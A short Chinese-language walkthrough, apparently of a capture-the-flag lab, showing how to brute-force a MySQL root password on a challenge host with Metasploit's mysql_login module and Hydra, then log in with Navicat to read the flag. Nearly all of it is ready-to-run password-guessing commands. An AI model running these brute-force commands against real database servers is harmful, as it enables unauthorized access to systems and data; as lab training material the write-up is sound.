Mysql密码爆破

CrispSheep

2025-01-18

工具利用

Mysql - 密码爆破

弱口令，用户名是root

需要用到MSF

1	msfconsole

使用mysql爆破破解模块

1	use auxiliary/scanner/mysql/mysql_login

显示所有参数

1	show options

暴力破解

set rhosts node.hackhub.get-shell.com			//设置目标服务器的ip地址
set rport 41148 			        //设置目标端口，为MySQL开启的端口号，默认是3306
set username root				    //设置用户名，默认即为root
set pass_file pass.txt   //指定密码字典文件的路径
run					                //开始爆破

set rhosts node.hackhub.get-shell.com			
set rport 41148 			        
set username root				    
set pass_file pass.txt   
run

九头蛇也可以Hydra

1	hydra -L user.txt -P pass.txt -t 2 -e n -f -v -s 41148 node.hackhub.get-shell.com mysql

![image-20250118222325340](./Mysql - 密码爆破/image-20250118222325340.png)

Navicat连接得到flag

/![image-20250118222941012](./Mysql - 密码爆破/image-20250118222941012.png)